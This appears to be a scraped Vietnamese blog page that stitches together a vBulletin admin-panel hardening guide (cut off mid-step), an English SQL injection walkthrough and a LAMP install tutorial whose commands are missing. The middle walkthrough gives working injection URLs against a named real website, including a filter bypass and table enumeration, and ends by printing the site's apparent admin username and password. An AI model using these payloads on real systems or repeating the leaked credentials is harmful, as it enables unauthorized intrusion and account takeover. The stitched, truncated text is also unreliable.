Cách bảo vệ Admincp của diễn đàn Vbulletin​

Những việc mà các bạn cần tìm hiểu và làm đó là:
1. Đổi tên (rename) cho cái thư mục admincp gốc của nó thành 1 cái tên khác mà các bạn chắc chắn chỉ có các admin có thể biết. Nhưng không sửa lại path trong file /includes/config.php. Ai không biết rename thì pm sent user + pass vps hay host qua inbox ccb Drop dùm cho :))
vd: Aitimduocadmincpnaykhong

2. Đặt mật khẩu bảo vệ thư mục cho cái thư mục admincp fake (Aitimduocadmincpnaykhong) này, có nhiều cách như add code vào global.php, index.php, hay đơn giản là cứ .htaccess + .htpasswd mà táng. Mấy bài hướng dẫn dạng này nhiều vô số kể các bạn tìm rồi làm theo thôi.

3. Thực hiện 2 bước dưới đây để chống lại việc tìm ra path thật bằng những tính năng có sẵn của Vbulletin.
a. Phân quyền lại cho các nhóm từ Mod
-> Cao nhất không cho xem Location của thành viên khác khi dùng chức năng Who's online nhiều bản việt hóa nó dịch thành "phúc trình vãng lai" gì đó trên forum. Cách phân quyền như sau: Login vào admincp trước rồi vào
Admin CP -> Usergroups -> Usergroup Manager -> Edit Usergroup -> Who's Online Permissions -> Can View Detailed Location Info for Users -> No
Save lại và làm tương tự cho các nhóm (Group) còn lại thế là xong phần phân quyền tránh dòm ngó.

b. Giới hạn Current activity (hoạt động hiện tại) trên các tài khoản có quyền truy cập vào admincp fake đó. bằng cách sửa code trong tempate đang sài. để không cho hiển thị những thông tin có thể làm lộ location của admin khi đang hành sự trên diễn đàn. Login vào admincp rồi vào

Styles & Templates -> Search in Templates -> tìm với skin muốn sửa và tìm với từ khóa : current activity
-> ra cái kết quả màu mè MEMBERINFO -> click vào nó và tìm tiếp với từ current activity sẽ thấy đoạn code như sau:


PHP:
 

SQL UNHEX --- 403 --- LIMIT.

SQL UNHEX --- 403 --- LIMIT.Please no modific nothing in this website ..only i share it for education only check what u are in and get out .... THANKS

http://ibms.co/about.php?pid=34 ### is ok ###


http://ibms.co/about.php?pid=34' ### error ##


Fatal error: Call to a member function fetch_assoc() on a non-object in /home/ibms/public_html/module/class.tbl.php on line 45


++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++


http://ibms.co/about.php?pid=34+order+by+1--+- ### is ok ###
http://ibms.co/about.php?pid=34+order+by+10--+- ### is ok ###
http://ibms.co/about.php?pid=34+order+by+20--+- ### is ok ###
http://ibms.co/about.php?pid=34+order+by+30--+- ### is ok ###
http://ibms.co/about.php?pid=34+order+by+40--+- ### is ok ###
http://ibms.co/about.php?pid=34+order+by+50--+- ### is ok ###
http://ibms.co/about.php?pid=34+order+by+60--+- ### is ok ###

WTF i'm drunk ....mmm not ... here the solution ..add ---> ' <---

example: /about.php?pid=34'+order+by+1--+-

http://ibms.co/about.php?pid=34'+order+by+1--+-

start again

http://ibms.co/about.php?pid=34'+order+by+1--+- ### is ok ###
http://ibms.co/about.php?pid=34'+order+by+10--+- ### is ok ###
http://ibms.co/about.php?pid=34'+order+by+20--+- ### is ok ###
http://ibms.co/about.php?pid=34'+order+by+30--+- ### error ###
http://ibms.co/about.php?pid=34'+order+by+29--+- ### error ###
http://ibms.co/about.php?pid=34'+order+by+28--+- ### error ###
http://ibms.co/about.php?pid=34'+order+by+27--+- ### error ###
http://ibms.co/about.php?pid=34'+order+by+26--+- ### error ###
http://ibms.co/about.php?pid=34'+order+by+25--+- ### is ok ###

Fatal error: Call to a member function fetch_assoc() on a non-object in /home/ibms/public_html/module/class.tbl.php on line 45

ok 25 Tables
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

now union+select

http://ibms.co/about.php?pid=34'+union+s...,24,25--+-

D: damn 403 f**k... i not want live in this world anymore...this website is secure D: ......


don't worry here the solution

add ( and )

example: /about.php?pid=34'+union+(select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25)--+-


http://ibms.co/about.php?pid=34'+union+(...24,25)--+-


done... now is ok again ..but not show the f**k column vulnerable...

only add ---> - <---

example: /about.php?pid=-34'+union+(select+1,2,3,

http://ibms.co/about.php?pid=-34'+union+...4​,25)--+-


well now show columns 6 and 7

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++​+++++++

now

add: unhex(hex(table_name)) +from+information_schema/**/.tables+where+table_schema=database()+LIMIT+0,200--+-

example

http://ibms.co/about.php?pid=-34'+union+...2,23,24,25
+from+information_schema/**/.tables+where+table_schema=database()+limit+0,200)--+- ### ( show "Admin" ) ###

done luck today in the first table ---admin is Admin Meh ok next

change the 0 by LIMIT to 1

http://ibms.co/about.php?pid=-34'+union+...2,23,24,25
+from+information_schema/**/.tables+where+table_schema=database()+limit+1,200)--+- ### ( show "Contact" ) ### ok leave it . already have the name ... is admin u see it before ...

ok now columns

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++​+++++++

############# now the columns ############


add: +union+select+1,unhex(hex(column_name)) +from+information_schema/**/.columns+where+table_schema=database()+LIMIT+0,200--+-


example:

http://ibms.co/about.php?pid=-34'+union+...2,23,24,25
+from+information_schema/**/.columns+where+table_schema=database()+limit+0,200)--+- ### ( show "Id" ) ###

but we need user and pass.let's go to search it only change +LIMIT+0,200--+- TO +LIMIT+1,200--+-

and +LIMIT+2,200--+- and +LIMIT+3,200--+- etc....########## this show username or admin user #################

http://ibms.co/about.php?pid=-34'+union+...2,23,24,25
+from+information_schema/**/.columns+where+table_schema=database()+limit+1,200)--+- ###( show "Username" )###

done here the username but continue searching for the pass .....change it for 2 and 3 etc ...


########### this show password #################

http://ibms.co/about.php?pid=-34'+union+...2,23,24,25
+from+information_schema/**/.columns+where+table_schema=database()+limit+2,200)--+- ###( show "Password" )###

well username and password by admin

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++​++++++++++++++++++++++++++++++++++++++
+++++++++++++++++

now dump dates ...

add: unhex(hex(username)) and +from+admin)--+-

http://ibms.co/about.php?pid=-34'+union+...2,23,24,25
+from+admin)--+-

###( show "admin" ) = username = admin) ###now column "password"

example: unhex(hex(password)),3,4,5,6, and +from+admin--+-

http://ibms.co/about.php?pid=-34'+union+...2,23,24,25
+from+admin)--+-

###( show "Ibmsanusha" ) = password = Ibmsanusha )###


Done..Enjoy testing others Websites.REMEMBER

Please no modific nothing in this website ..only i share it for education only check what u are in and get out .... THANKS
 

Cài Đặt Apache2 Với Php5 Và Hỗ Trợ Mysql Trên Ubuntu 11.10

LAMP là chữ viết tắt thường được dùng để chỉ sự sử dụng các phần mềm Linux, Apache, MySQL và ngôn ngữ văn lệnh PHP hay Perl hay Python để tạo nên một môi trường máy chủ Web có khả năng chứa và phân phối các trang Web động. Bài viết sau sẽ hướng dẫn các bạn cài đặt máy chủ web Apache2 trên Ubuntu 11.10 server với PHP5 hỗ trợ cho mod_php và MySQL.

Lưu ý chung

Trong phần minh họa này chúng tôi sử dụng hostname server1.example.com với địa chỉ IP 192.168.0.23. Bạn có thể thay đổi sao cho phù hợp với mình.

Các bước sau cần chạy với quyền root, vì vậy bạn có thể chạy lệnh:


để đăng nhập với quyền root.

Cài đặt MySQL 5

  • Đầu tiên chúng ta sử dụng lệnh sau để cài đặt MySQL 5:


  • Bạn sẽ được yêu cầu cung cấp một mật khẩu cho MySQL của user root – đây là mật khẩu có giá trị cho người dùng root@localhost cũng như root@server1.example.com, vì thế chúng ta sẽ chỉ định một password cho MySQL:
New password for the MySQL “root” user: <– Mat khau root SQL
Repeat password for the MySQL “root” user: <– Mat khau root SQL

Cài đặt Apache2

Apache2 có sẵn trong gói Ubuntu, người dùng chỉ cần sử dụng lệnh sau để cài đặt:Bây giờ nhập vào đường dẫn http://192.168.0.23 trong trình duyệt của mình, bạn sẽ thấy trang của Apache2:

[​IMG]

Theo mặc định, thư mục root của Apache2 thuộc /var/www trong Ubuntu, và tập tin cấu hình của nó là/etc/apache2/apache2.conf. Các cấu hình bổ sung được lưu trữ trong thư mục con của thư mục /etc/apache2, chẳng hạn /etc/apache2/mods-enabled (cho các module Apache), /etc/apache2/sites-enabled (cho virtual hosts), và /etc/apache2/conf.d.

Cài đặt PHP5

Chúng ta tiến hành cài đặt PHP5 và module Apache PHP5 bằng lệnh:

Sau đó khởi động lại Apache:

Thử nghiệm PHP5 và ghi nhận thông tin về quá trình cài đặt

Theo mặc định, thư mục root của website là /var/www. Chúng ta sẽ tạo một tập tin php nhỏ (info.php) trong thư mục này và gọi nó trên trình duyệt. Tập tin này sẽ hiển thị các thông tin hữu ích về trình cài đặt PHP, chẳng hạn như phiên bản của PHP hiện tại.


1
<?phpphpinfo();?>


Bây giờ chúng ta gọi file này trên trình duyệt (192.168.0.23/info.php).

[​IMG]

Với hình ảnh trên cho thấy PHP5 đang hoạt động thông qua Apache 2.0 Handler (hiển thị tại dòng Server API). Nếu di chuyển tiếp xuống bên dưới bạn sẽ thấy các module đã được kích hoạt trong PHP 5. MySQL không được liệt kê có nghĩa là PHP5 không hỗ trợ MySQL. Chúng ta khắc phục bằng cách dưới đây:

“Bắt” PHP5 hỗ trợ MySQL

Để MySQL được hỗ trợ trong PHP5, chúng ta cần cài đặt gói php5-mysql. Đây là việc làm tốt để cài đặt các module khác của PHP5 cũng như những ứng dụng cần thiết về sau.

Tìm kiếm những module có sẵn của PHP5:


Chọn những gì cần cài đặt:


Cuối cùng restart Apache2:

Bây giờ bạn hãy tải lại trang 192.168.0.23/info.php trên trình duyệt của mình, kéo xuống dưới lần nữa bạn sẽ thấy những module mới, bao gồm cả MySQL:

[​IMG]

phpMyAdmin

PhpMyAdmin là một giao diện web, thông qua đó bạn có thể quản lý cơ sở dữ liệu MySQL. Vì vậy khuyến cáo bạn nên cài đặt nó.


Bạn sẽ nhận được câu hỏi sau:

web server to reconfigure automatically: <– nhập apache2
Configure database for phpmyadmin with dbconfig-common? <– nhập No

Sau đó bạn có thể truy cập vào phpMyAdmin theo 192.168.0.23/phpmyadmin/:

[​IMG]
 

Copyright © Dương-UG Blog's - Nguyễn Bình Dương